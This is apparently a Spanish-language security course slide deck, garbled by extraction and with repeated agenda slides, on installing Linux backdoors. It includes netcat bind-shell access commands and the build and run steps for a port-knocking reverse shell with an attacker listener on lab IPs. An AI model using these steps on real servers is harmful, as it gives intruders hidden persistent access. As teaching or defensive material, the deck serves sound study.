Académique Documents
Professionnel Documents
Culture Documents
Sistemas Operativos
Instalacin, configuracin y uso
de Backdoors
AGENDA
1.
2.
3.
4.
5.
6.
7.
Quin soy?
Casos de Seguridad Informtica en el Per y el
mundo
Buscando vulnerabilidades backdoors
Qu es un backdoor?
1. Backdoor SETUID
2. Backdoor Mdulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
Instalando y configurando backdoors (ejemplos)
Informacin sobre el curso
Conclusiones
AGENDA
1.
2.
3.
4.
5.
6.
Quin soy?
Casos de Seguridad Informtica en el Per y el
mundo
Buscando vulnerabilidades
Qu es un backdoor?
Instalando
y
configurando
backdoors
(ejemplos)
Conclusiones
#whoami
www.facebook.com/El.Palomo.Seguridad.Informacion
AGENDA
1.
2.
3.
4.
5.
6.
Quin soy?
Casos de Seguridad Informtica en el Per y el
mundo
Buscando vulnerabilidades
Qu es un backdoor?
Instalando
y
configurando
backdoors
(ejemplos)
Conclusiones
Quines nos
amenazan?
Contratistas o proveedores
66%
Hacktivistas 54%
Fuente E&Y Encuesta Global de Seguridad de Inf.
2014
AGENDA
1.
2.
3.
4.
5.
Quin soy?
Casos de Seguridad Informtica en el Per y el
mundo
Qu es un backdoor?
Instalando
y
configurando
backdoors
(ejemplos)
Conclusiones
AGENDA
1.
2.
3.
4.
5.
Quin soy?
Casos de Seguridad Informtica en el Per y el
mundo
Qu es un backdoor?
Instalando
y
configurando
backdoors
(ejemplos)
Conclusiones
ATACANTE 2
- Computador desde el cual se
explotaran los backdoors
- Sistema Operativo Linux
Direccin IP: 192.168.4.132
En el cliente:
Root> nc 192.168.4.130 80
GET root
Backdoor: BindShell
Las primeras herramientas utilizados
por Hackers fue la navaja suiza
NETCAT.
Una BindShell es un programa
corriendo una SHELL dentro de un
proceso de red.
Una BindShell puede estar escrita en
cualquier lenguaje de programacin.
http://netcat.sourceforge.net/download.
php
Backdoor: KnockOut
Knock viene del ingles tocar la
puerta.
Este es un backdoor del tipo
Reverse Shell que pasa
desapercibido.
Slo puede ser accedido por
aquel que conozca la
combinacin de la puerta
correcta.
Backdoor: KnockOut
En el servidor:
Root> $make servidor
Root> ./knock-outd knock-out.conf eth5
En el cliente (atacante):
Root> $make cliente
Root> ./knock-outc 192.168.4.130 knock-out.conf
Root> ./netcat -lv -p 64876
AGENDA
1.
2.
3.
4.
5.
6.
Quin soy?
Casos de Seguridad Informtica en el Per y el
mundo
Qu es un backdoor?
Instalando
y
configurando
backdoors
(ejemplos)
Informacin sobre el curso
Conclusiones
Conclusiones:
- Instalar backdoors es la manera mas sencilla
de acceder a servidor comprometidos.
- Cuando un servidor Linux es comprometido
se recomienda reestablecer un backup ya que
detectar backdoors o rootkits es muy
complicado.
PREGUNTAS?